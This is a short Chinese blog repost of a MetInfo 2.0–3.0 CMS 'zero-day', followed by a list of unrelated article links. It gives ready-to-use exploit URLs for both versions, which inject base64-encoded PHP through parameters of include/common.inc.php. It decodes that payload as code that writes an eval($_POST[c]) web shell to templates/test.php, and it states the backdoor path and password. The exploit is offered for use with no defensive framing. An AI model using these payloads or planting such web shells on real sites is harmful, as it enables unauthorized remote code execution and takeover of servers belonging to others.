MetInfo2.0-3.0 吃掉 0day
来源:互联网 发布:淘宝衣服来自太平间 编辑:程序博客网 时间:2024/05/02 08:18
2.0
+poc:
include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');
backdoor:http://site/templates/test.php password:c
-----------------------------------------------------------------------------------------
3.0
+POC:/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');
- MetInfo2.0-3.0 吃掉 0day
- day 0
- DAY 0
- 不然oracle吃掉小数点前的0的方法
- 0day漏洞,0day拦截
- What is 0Day?
- warez和0day
- 留神IE 0day
- 每日 0day
- 超星0DAY
- 0day漏洞
- phpcms injection 0day
- debian 0day
- 0day搜索引擎
- 什么是0Day
- 0day介绍
- JavaOne 2009 - Day 0
- 0day资料收集
- Subversion的安装和使用
- .net如何实现10秒倒计时
- 一个详细的VBA实例(连接SQL Server2000)
- perl 5.10新特性智能匹配操作符合~~介绍
- 慎用线程
- MetInfo2.0-3.0 吃掉 0day
- Jquery特效一:图片轮换显示
- Excel Application对象应用大全(一)
- Microsoft Enterprise Library 简介与请大家下载Microsoft Enterprise Library 5.0体验微软最新技术应用于企业信息平台
- Android更新下载进度条
- Excel Application对象应用大全(二)
- 子页面调用父页面方法
- Excel Application对象应用大全(三)
- 继承和组合的比较